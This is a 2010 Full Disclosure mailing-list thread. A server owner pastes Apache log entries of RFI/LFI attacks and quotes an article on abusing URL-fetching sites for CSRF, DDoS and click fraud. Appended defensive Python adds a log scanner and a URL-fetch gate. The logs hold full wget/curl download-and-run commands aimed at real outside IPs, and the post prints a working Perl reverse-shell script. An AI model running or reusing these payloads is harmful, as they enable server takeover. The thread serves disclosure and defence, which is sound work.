Full Disclosure mailing list archives

Re: Using of the sites for attacks on other sites
From: mrx <mrx () propergander org uk>
Date: Wed, 30 Jun 2010 08:22:29 +0100

I have been witnessing such attacks in the past few weeks. Most of the URLs are trying to exploit components of web software that I do not have installed. Some do GET existing pages such as index.php and tag the attack on the end. Such attacks began about 2 weeks ago. These attacks have so far come from three different IP addresses, and I was getting around a dozen such accesses every other day. I think my server is pretty secure, but I am a novice so what do I really know? And as such I have blocked these IPs from accessing my server. FYI, the originating IPs all have WordPress blogs on them.

If anyone is interested here is one such attack:

<apache2 log entries>

88.181.49.182 - - [28/Jun/2010:19:54:35 +0100] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://212.154.190.140/back.txt?? HTTP/1.1" 404 220 "-" "<?system('cd /var/tmp;wget http://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30 80;wget http://212.154.190.140/cback;chmod +x cback;./cback 192.24.5.30 80;cd /dev/shm;curl -O http://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30 80;curl -O http://212.154.190.140/cback;chmod +x cback;./cback 192.24.5.30 80');?>;<?exec_shell('cd /var/tmp;wget http://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30 80;wget http://212.154.190.140/cback;chmod +x cback;./cback 192.24.5.30 80;cd /dev/shm;curl -O http://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30 80;curl -O http://212.154.190.140/cback;chmod +x cback;./cback 192.24.5.30 80');?>;<?passthru('cd /var/tmp;wget http://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30 80;wget http://212.154.190.140/cback;chmod +x cback;./cback 192.24.5.30 80;cd /dev/shm;curl -O http://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30 80;curl -O http://212.154.190.140/cback;chmod +x cback;./cback 192.24.5.30 80');?> ; Ustupid MF is Back ; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

Here is another example:

94.199.181.165 - - [21/Jun/2010:05:36:27 +0100] "GET /index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 3775 "-" "<?system('cd /var/tmp;wget http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80;cd /dev/shm;curl -O http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;curl -O http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80');?> ;<?exec_shell('cd /var/tmp;wget http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80;cd /dev/shm;curl -O http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;curl -O http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80');?> ;<?passthru('cd /var/tmp;wget http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80;cd /dev/shm;curl -O http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;curl -O http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80');?>;Ustupid MF is Back; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

</apache2 log entries>

<cb.txt content>

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";HISTFILE=/dev/null /bin/sh -i';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);


</cb.txt content>

If anyone would like more log entries let me know.

If all this is beneath you guys.... sorry I bothered you.

regards
Dave

On 28/06/2010 21:13, MustLive wrote:
Hello participants of Full-Disclosure!

For the last two months I didn't post my articles to this list due to some
not-so-serious moaning in April about some of my articles (you can always
find my articles at my site and in the WASC Mailing List). But at the end
of June I decided to remind you about my latest articles.

Recently I wrote a new article, Using of the sites for attacks on other
sites (http://websecurity.com.ua/4322/). This is a brief English version
of it.

Last year, in the article DoS attacks via Abuse of Functionality
vulnerabilities (it was mentioned at
http://jeremiahgrossman.blogspot.com/2010/01/top-ten-web-hacking-techniques-of-2009.html),
I wrote about the possibility of conducting DoS attacks on other sites via
Abuse of Functionality vulnerabilities. In particular, I showed examples
of such vulnerabilities at the web sites regex.info and www.slideshare.net.
These attacks can be either unidirectional DoS or bidirectional DoS,
depending on the capacities of both servers.

And now I'll tell you about the possibility of conducting CSRF attacks on
other sites via Abuse of Functionality vulnerabilities. I began researching
such attacks back in 2007, when I found such a vulnerability at regex.info.

Using of Abuse of Functionality for attacks on other sites.

Sites which allow making requests to other web sites (to arbitrary web
pages) have an Abuse of Functionality vulnerability and can be used for
conducting CSRF attacks on other sites, including DoS attacks via Abuse of
Functionality, as mentioned above. CSRF attacks can be made only on those
pages which don't require authorization.

For these attacks it's possible to use either Abuse of Functionality
vulnerabilities (similar to those mentioned in this article) or Remote File
Include vulnerabilities (as in PHP applications) - that is, Abuse of
Functionality via RFI.

This attack method can be of use when it's needed to conduct an invisible
CSRF attack on another site (so as not to reveal yourself), for conducting
DoS and DDoS attacks, and for conducting other attacks, particularly for
performing actions which need to be made from different IPs. For example,
in online voting, for inflating hit counters and advertising hits at the
site, and also for inflating clicks (click fraud).

Abuse of Functionality:

The attack is carried out by a request from one site (http://site) to
another (http://another_site) using the appropriate function of the site
(http://site/script).

http://site/script?url=http://another_site

Advantages of this attack method.

In this part of the article I gave a list of advantages of this attack
method. And I included another two important paragraphs:

Note that this DoS attack can be used for attacks on redirectors, which I
wrote about in my articles Redirector's hell and Hellfire for redirectors.

Also, when conducting DoS attacks it's possible to use several such servers
at once and so conduct a DDoS attack. In that case these servers will act
as zombie computers, i.e. the botnet will be made not from home computers
but from web servers (which can have larger capacities and faster
connections). So these vulnerabilities can lead to the appearance of a new
class of botnets (with zombie servers).

Examples of vulnerable web sites and web services.

In this part of the article I showed examples of different web sites and
web services which could be used for conducting attacks on other sites,
including regex.info, www.slideshare.net, anonymouse.org, www.google.com,
translate.google.com, babelfish.altavista.com, babelfish.yahoo.com,
keepvid.com, the web application Firebook, the W3C validators and iGoogle.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


-- 
Mankind's systems are white sticks tapping walls.
Thanks Roy
http://www.propergander.org.uk
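The two Apache entries Dave posted above carry three indicators worth alerting on: a full URL handed to a query parameter (RFI), traversal to /proc/self/environ (LFI), and PHP shell-exec calls placed in the User-Agent. The following is an added detection example, not part of the original post, that parses combined-format log lines and flags those indicators; the sample lines, client IPs and payload hosts are constructed placeholders modelled on the posted entries.

```python
import re
from urllib.parse import unquote

# Apache "combined" log format, as used by the entries quoted above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>.*)"$')

# (indicator, field, pattern): a URL fed to a query parameter (RFI), traversal
# to /proc/self/environ (LFI), and PHP shell-exec calls inside the User-Agent.
RULES = [
    ("rfi_url_in_query", "path",
     re.compile(r'[?&][^=&]*=(?:https?|ftp)://', re.I)),
    ("lfi_proc_environ", "path",
     re.compile(r'(?:\.\./)+.*?proc/self/environ', re.I)),
    ("php_code_in_user_agent", "ua",
     re.compile(r'<\?(?:php)?\s*(?:system|exec|passthru|shell_exec|exec_shell)\s*\(', re.I)),
]

def parse(line):
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def classify(rec):
    """Names of the indicators that fire on one parsed record."""
    fields = {"path": unquote(rec["path"]), "ua": rec["ua"]}
    return [name for name, field, rx in RULES if rx.search(fields[field])]

def scan(lines):
    """One finding per suspicious line. The status is kept on purpose: a 404
    (component not installed, as in the first posted entry) can be closed
    quickly, while a 200 only says the script answered and needs a manual check."""
    findings = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        hits = classify(rec)
        if hits:
            findings.append({"ip": rec["ip"], "status": int(rec["status"]),
                             "indicators": hits})
    return findings

# Constructed sample lines modelled on the posted entries; client IPs, payload
# hosts and callback addresses are documentation-range placeholders.
SAMPLE_LOG = r'''
203.0.113.10 - - [28/Jun/2010:19:54:35 +0100] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://198.51.100.7/back.txt?? HTTP/1.1" 404 220 "-" "<?system('cd /var/tmp;wget http://198.51.100.7/cb.txt;perl cb.txt 192.0.2.1 80');?>"
203.0.113.11 - - [21/Jun/2010:05:36:27 +0100] "GET /index.php?_SERVER[ConfigFile]=../../../../../../proc/self/environ HTTP/1.1" 200 3775 "-" "<?passthru('id');?>"
198.51.100.20 - - [21/Jun/2010:05:40:00 +0100] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
'''.strip().splitlines()
```

Running `scan(SAMPLE_LOG)` reports the first two lines and leaves the ordinary browser request alone.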
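MustLive's quoted article describes sites that fetch an arbitrary client-supplied URL (http://site/script?url=http://another_site) being turned into relays for CSRF and (D)DoS against third parties. As an added example that is not part of either author's text, this is a gate for such a feature from the operator's side: an allow-list and public-address check on the destination, a per-client rate limit, and an outbound identity so the target can attribute the traffic; ALLOWED_HOSTS, RELAY_IDENT and FetchPolicy are hypothetical names.

```python
import ipaddress
import socket
import time
from collections import deque
from urllib.parse import urlsplit

# Assumed policy for a "fetch this URL for me" feature (http://site/script?url=...).
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"example.org", "www.example.org"}        # hypothetical allow-list
RELAY_IDENT = "example-relay/1.0 (+https://example.org/abuse)"  # hypothetical identity

class FetchPolicy:
    def __init__(self, per_client_limit=10, window_s=60.0, resolver=socket.gethostbyname):
        self.limit, self.window, self.resolver = per_client_limit, window_s, resolver
        self.history = {}   # client id -> deque of accepted-request timestamps

    def check_url(self, url):
        """(ok, reason): only allow-listed public hosts, no embedded credentials."""
        parts = urlsplit(url)
        if parts.scheme not in ALLOWED_SCHEMES:
            return False, "scheme not allowed"
        if parts.username or parts.password:
            return False, "credentials in URL"
        host = (parts.hostname or "").lower()
        if host not in ALLOWED_HOSTS:
            return False, "host not on allow-list"
        # An allow-listed name must still resolve to a public address, so the
        # feature cannot be pointed back at the site's own internal network.
        if not ipaddress.ip_address(self.resolver(host)).is_global:
            return False, "resolves to non-public address"
        return True, "ok"

    def allow_request(self, client, url, now=None):
        """Sliding-window limit per client (what stops the site acting as one
        node of a relayed DDoS), then the destination check."""
        now = time.monotonic() if now is None else now
        q = self.history.setdefault(client, deque())
        while q and now - q[0] > self.window:
            q.popleft()
        if len(q) >= self.limit:
            return False, "rate limit exceeded"
        ok, reason = self.check_url(url)
        if ok:
            q.append(now)
        return ok, reason

    @staticmethod
    def outbound_headers():
        """Never forward the client's cookies or auth; name the relay so the
        target can attribute and block it, which defeats the 'invisible' use."""
        return {"User-Agent": RELAY_IDENT, "Via": "1.1 " + RELAY_IDENT.split("/")[0]}
```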